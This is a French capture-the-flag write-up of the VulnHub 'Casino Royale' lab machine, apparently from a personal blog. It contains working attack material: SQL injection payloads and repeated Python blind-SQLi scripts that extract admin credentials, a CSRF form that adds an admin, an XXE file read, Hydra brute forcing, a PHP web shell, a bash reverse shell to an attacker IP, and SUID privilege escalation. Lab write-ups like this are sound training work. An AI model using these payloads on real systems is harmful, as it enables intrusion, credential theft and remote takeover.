Casino Royale: 1 VulnHub (Writeup)

Skills:

Web Enumeration
Abusing PokerMax - SQLI (SQL Injection)
Manual Blind SQLI (SQL Injection) - Python Scripting
Pokermax players management
Virtual Hosting
Snowfox CMS Exploitation - Cross-Site Request Forgery (Add Admin) [CSRF]
Abusing the SMTP service to send a fraudulent email in order to exploit the CSRF
Information Leakage
XXE Attack - XML External Entity Injection (Reading internal files)
FTP Brute Force - Hydra
Uploading malicious PHP file + Bypassing Restiction
Information Leakage - Reading config files
Abusing SUID privilege [Privilege Escalation]

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Reconnaissance de l'adresse IP via arp-scan :

Utilisation de la commande arp-scan pour détecter l'adresse IP de la machine:

arp-scan -I ens33 --localnet --ignoredups

Recherche des ports ouverts avec Nmap : Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap :

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 192.168.71.142 -oG allPorts

Analyse des ports ouverts avec extractport : Utilisation de la fonction extractport pour afficher de manière synthétique les ports ouverts et les copier dans le presse-papiers.

Scan de la version des ports avec Nmap : Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p80,21,25,8081 192.168.71.142 -oN targeted

Identification de la version de la machine avec WhatWeb : Utilisation de WhatWeb pour scanner le site internet et identifier la version de la machine (Ubuntu) et d'Apache :

whatweb http://192.168.71.142

Détection des technologies du site avec Wappalyzer :

Utilisation de l'extension Wappalyzer sur Google Chrome pour détecter les technologies utilisées sur le site internet.

Script de reconnaissance de directoire pour les ports 80 et 8081 :

Utilisation de nmap avec le script http-enum sur les ports 80 et 8081 de l'adresse IP 192.168.71.142. Le résultat est enregistré dans le fichier webScan.

 nmap --script http-enum -p80,8081 192.168.71.142 -oN webScan

Vulnerabilité Searchsploit:

Recherche de vulnérabilités avec Searchsploit

Après avoir identifié une page web "pokermax", utilisation de l'outil Searchsploit pour rechercher des vulnérabilités potentielles.

Identification d'un panneau d'authentification admin:

Découverte d'un panneau d'authentification admin. En utilisant un script JavaScript dans la console, la variable ValidUserAdmin est modifiée à "administrateur", permettant l'accès à configure.php de pokeradmin.

javascript:document.cookie = "ValidUserAdmin=admin";

Vulnérabilité SQL Injection

Détection de la vulnérabilité d'injection SQL:

Identification d'une vulnérabilité d'injection SQL sur le site internet. Utilisation de BurpSuite pour intercepter le trafic.

Découverte du Nombre de Colonnes avec ORDER BY

admin' order by 7-- -

Tentative de Listing des Tables avec UNION SELECT

admin' union select 1,2,3,4,5,6,7-- -

Utilisation d'une Injection SQL basée sur le Temps

admin' and sleep(5)-- -
admin' and if(substr(database(),1,1)='a',sleep(5),1)-- -

Automatisation avec Python pour Extraire le Nom de la Base de Données

admin' and if(substr(database(),%d,1)='%s',sleep(0.85),1)-- -

#!/usr/bin/python3

import requests
import signal
import time
import sys
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.142/pokeradmin/index.php"
characters = string.ascii_lowercase + string.digits + ":,_-."
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

def sqli():
    data = ""
    p1 = log.progress("SQLI:")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Extract data:")
    
    for position in range(1, 12):
        for character in characters:
            post_data = {
                'op': 'adminlogin',
                'username': "admin' and if(substr(database(),%d,1)='%s',sleep(0.85),1)-- -" % (position, character),
                'password': 'admin'
            }

            p1.status(post_data['username'])
            time_start = time.time()
            r = requests.post(main_url, data=post_data, headers=headers)
            time_end = time.time()

            if time_end - time_start > 0.85:
                data += character
                p2.status(data)
                break

    p1.success("SQL injection completed")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Automatisation avec Python pour Extraire le Nom de toutes les Base de Données

admin' and if(substr((select group_concat(schema_name) from information_schema.schemata),%d,1)='%s',sleep(0.85),1)-- -

#!/usr/bin/python3

import requests
import signal
import time
import sys
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.142/pokeradmin/index.php"
characters = string.ascii_lowercase + string.digits + ":,_-."
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

def sqli():
    data = ""
    p1 = log.progress("SQLI:")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Extract data:")
    
    for position in range(1, 100):
        for character in characters:
            post_data = {
                'op': 'adminlogin',
                'username': "admin' and if(substr((select group_concat(schema_name) from information_schema.schemata),%d,1)='%s',sleep(0.85),1)-- -" % (position, character),
                'password': 'admin'
            }

            p1.status(post_data['username'])
            time_start = time.time()
            r = requests.post(main_url, data=post_data, headers=headers)
            time_end = time.time()
            if time_end - time_start > 0.85:
                data += character
                p2.status(data)
                break

    p1.success("SQL injection completed")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Automatisation avec Python pour Extraire le Nom des tables:

admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='pokerleague'),%d,1)='%s',sleep(0.85),1)-- -

#!/usr/bin/python3
import requests
import signal
import time
import sys
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.142/pokeradmin/index.php"
characters = string.ascii_lowercase + string.digits + ":,_-."
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

def sqli():
    data = ""
    p1 = log.progress("SQLI:")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Extract data:")

    for position in range(1, 100):
        for character in characters:
            post_data = {
                'op': 'adminlogin',
                'username': "admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='pokerleague'),%d,1)='%s'," % (position, character),
                'password': 'admin'
            }
            p1.status(post_data['username'])
            time_start = time.time()
            r = requests.post(main_url, data=post_data, headers=headers)
            time_end = time.time()

            if time_end - time_start > 0.85:
                data += character
                p2.status(data)
                break

    p1.success("SQL injection completed")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Automatisation avec Python pour Extraire le Nom des colonnes:

admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='pokerleague' and table_name='pokermax_admin'),%d,1)='%s',sleep(0.85),1)-- -

#!/usr/bin/python3

import requests
import signal
import time
import sys
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.142/pokeradmin/index.php"
characters = string.ascii_lowercase + string.digits + ":,_-."
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

def sqli():
    data = ""
    p1 = log.progress("SQLI:")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Extract data:")
    
    for position in range(1, 100):
        for character in characters:
            post_data = {
                'op': 'adminlogin',
                'username': "admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='pokerleague' and table_name='pokermax_admin'),%d,1)='%s',sleep(0.85),1)-- -" % (position, character),
                'password': 'admin'
            }

            p1.status(post_data['username'])
            time_start = time.time()
            r = requests.post(main_url, data=post_data, headers=headers)
            time_end = time.time()

            if time_end - time_start > 0.85:
                data += character
                p2.status(data)
                break

    p1.success("SQL injection completed")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Automatisation avec Python pour Extraire le contenue des colonnes username et password:

admin' and if(substr((select group_concat(username,0x3a,password) from pokermax_admin),%d,1)='%s',sleep(0.85),1)-- -

#!/usr/bin/python3

import requests
import signal
import time
import sys
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.142/pokeradmin/index.php"
characters = string.ascii_lowercase + string.digits + ":,_-."
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

def sqli():
    data = ""
    p1 = log.progress("SQLI:")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Extract data:")
    
    for position in range(1, 100):
        for character in characters:
            post_data = {
                'op': 'adminlogin',
                'username': "admin' and if(substr((select group_concat(username,0x3a,password) from pokermax_admin),%d,1)='%s',sleep(0.85),1)-- -" % (position, character),
                'password': 'admin'
            }

            p1.status(post_data['username'])
            time_start = time.time()
            r = requests.post(main_url, data=post_data, headers=headers)
            time_end = time.time()
            if time_end - time_start > 0.85:
                data += character
                p2.status(data)
                break

    p1.success("SQL injection completed")
    p2.success(data)

if __name__ == '__main__':
    sqli()

Détection de la Nécessité de Virtual Hosting sur le Site Web Admin Manage:

En retournant sur le site web "admin manage", une indication suggère que le site nécessite le virtual hosting.

Identification de l'Email de l'Admin du CMS:

Sur le site, l'email de l'admin du CMS est "[email protected]". Les instructions indiquent d'envoyer un email par le port 25 avec le sujet contenant le nom du "manage player".

Identification du CMS Snow Fox :

L'analyse du nouveau site révèle qu'il utilise un CMS appelé Snow Fox.

Vulnérabilité CSRF:

Recherche sur SearchExploit pour le CMS Snow Fox, qui révèle une vulnérabilité CSRF.

Fichier HTML Vulnérable :

<html>
  <body>
    <form action="http://casino-royale.local/vip-client-portfolios/?uri=admin/accounts/create" method="POST">
      <input type="hidden" name="emailAddress" value="[email protected]" />
      <input type="hidden" name="verifiedEmail" value="verified" />
      <input type="hidden" name="username" value="jordan-admin" />
      <input type="hidden" name="newPassword" value="jordan-password" />
      <input type="hidden" name="confirmPassword" value="jordan-password" />
      <input type="hidden" name="userGroups[]" value="34" />
      <input type="hidden" name="userGroups[]" value="33" />
      <input type="hidden" name="memo" value="CSRFmemo" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="formAction" value="submit" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

Tentative d'Attaque CSRF pour Créer un Compte Admin via Snow Fox CMS

Se connecter via telnet sur le port SMTP 25.

Envoyer un email à "[email protected]" avec le liens de notrre serveur python3 HTTP avec le fichier.html vulnérable.

Connexion avec le Compte Admin du CMS :

Tentative de connexion avec les nouveaux identifiants, résultant en la création d'un compte admin sur Snow Fox CMS.

Suite à l'exploitation de la vulnérabilité CSRF, un compte admin du CMS Snow Fox a été créé.

Identification d'une Piste dans la Description d'un Utilisateur

Dans la description d'un utilisateur du CMS, une piste supplémentaire indique un répertoires à suivre.

Vulnérabilité XXE (XML External Entity Injection) :

Analyse du Code Source (Structure XML) Intercepté avec BurpSuite

Tentative d'Attaque XXE (XML External Entity Injection)

Modification de la méthode de la requête de GET à POST.

Essai d'injection d'un modèle XXE dans la requête POST.

<creds>

	<customer>
		Jordan
	</customer>

	<password>

		jordan123

	</password>

</creds>

Observation de la manière dont le serveur interprète le modèle XXE.

Pour accéder aux fichiers système, nous devrions créer une nouvelle entité, par exemple, "myFile", de la manière suivante : <!DOCTYPE foo [<!ENTITY myFile SYSTEM "file:///etc/passwd">]>

Ensuite, dans une variable, nous devrions poster le résultat avec "&myFile" comme ceci :

Identification d'un utilisateur "ftpUserULTRA

FTP Brute Force - Hydra:

Attaque de Force Brute sur le Protocole FTP avec Hydra

Utilisation d'hydra pour lancer une attaque de force brute sur le protocole FTP avec l'utilisateur "ftpUserULTRA".

hydra -l ftpUserULTRA -P /usr/share/wordlists/rockyou.txt ftp://192.168.71.142 -t 20

Identification réussie du mot de passe "bankbank".

Exploration des Capacités de Listage de Répertoires sur le répertoires /ultra-access-view:

Observation de la capacité de lister les répertoires sur la route /ultra-access-view.

Ajout d'un Fichier cmd.php pour une Reverse Shell:

<?php
system($_GET['cmd']);
?>

Tentative d'ajout au serveur, mais échec en raison de la configuration FTP restrictive.

Téléchargement du Fichier cmd.php sans Extension

Téléchargement du fichier cmd.php sans extension en contournant la restriction FTP.

Renommage du Fichier avec Extension 3 pour Contourner les Restrictions:

Renommage du fichier en ajoutant l'extension "3" car le serveur accepte uniquement les fichiers avec l'extension "php".

Refus d'Accès au Fichier après le Renommage:

Le serveur refuse l'accès au fichier, indiquant que les droits nécessaires sont manquants.

Interprétation du Fichier cmd.php après Autorisation

chmod 777 cmd.php3

Le fichier cmd.php est finalement interprété après l'obtention des droits d'accès nécessaires.

Exécution d'une Reverse Shell pour Accéder à la Machine:

bash -c "bash -i >%26 /dev/tcp/192.168.71.128/443 0>%26 1"

Réussite de l'accès à la machine avec succès.

Traitement du Terminal pour Surmonter les Privilèges

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Élévation de privilèges

Surmontage des privilèges pour rechercher des fichiers avec des droits SUID :

find / -perm -4000 2>/dev/null

Exécution d'un binaire cherchant un fichier "run.sh" dans le répertoire /tmp sans route spécifique.

Création du fichier "run.sh" dans /tmp avec le contenu suivant pour obtenir un shell root :

bash -p

FLAG CAPTURED :)

Mis à jour il y a 1 an

hashtagReconnaissance:

hashtagScript de reconnaissance de directoire pour les ports 80 et 8081 :

hashtagVulnerabilité Searchsploit:

hashtagVulnérabilité SQL Injection

hashtagIdentification d'une vulnérabilité d'injection SQL sur le site internet. Utilisation de BurpSuite pour intercepter le trafic.

hashtagDécouverte du Nombre de Colonnes avec ORDER BY

hashtagTentative de Listing des Tables avec UNION SELECT

hashtagUtilisation d'une Injection SQL basée sur le Temps

hashtagAutomatisation avec Python pour Extraire le Nom de la Base de Données

hashtagAutomatisation avec Python pour Extraire le Nom de toutes les Base de Données

hashtagAutomatisation avec Python pour Extraire le Nom des tables:

hashtagAutomatisation avec Python pour Extraire le Nom des colonnes:

hashtagAutomatisation avec Python pour Extraire le contenue des colonnes username et password:

hashtagDétection de la Nécessité de Virtual Hosting sur le Site Web Admin Manage:

hashtagIdentification de l'Email de l'Admin du CMS:

hashtagVulnérabilité CSRF:

hashtagSuite à l'exploitation de la vulnérabilité CSRF, un compte admin du CMS Snow Fox a été créé.

hashtagIdentification d'une Piste dans la Description d'un Utilisateur

hashtagVulnérabilité XXE (XML External Entity Injection) :

hashtagAnalyse du Code Source (Structure XML) Intercepté avec BurpSuite

hashtagTentative d'Attaque XXE (XML External Entity Injection)

hashtagIdentification d'un utilisateur "ftpUserULTRA

hashtagFTP Brute Force - Hydra:

hashtagAttaque de Force Brute sur le Protocole FTP avec Hydra

hashtagExploration des Capacités de Listage de Répertoires sur le répertoires /ultra-access-view:

hashtagAjout d'un Fichier cmd.php pour une Reverse Shell:

hashtagTéléchargement du Fichier cmd.php sans Extension

hashtagRenommage du Fichier avec Extension 3 pour Contourner les Restrictions:

hashtagRefus d'Accès au Fichier après le Renommage:

hashtagInterprétation du Fichier cmd.php après Autorisation

hashtagRéussite de l'accès à la machine avec succès.

hashtagTraitement du Terminal pour Surmonter les Privilèges

hashtagÉlévation de privilèges

hashtagSurmontage des privilèges pour rechercher des fichiers avec des droits SUID :

hashtagExécution d'un binaire cherchant un fichier "run.sh" dans le répertoire /tmp sans route spécifique.

hashtagCréation du fichier "run.sh" dans /tmp avec le contenu suivant pour obtenir un shell root :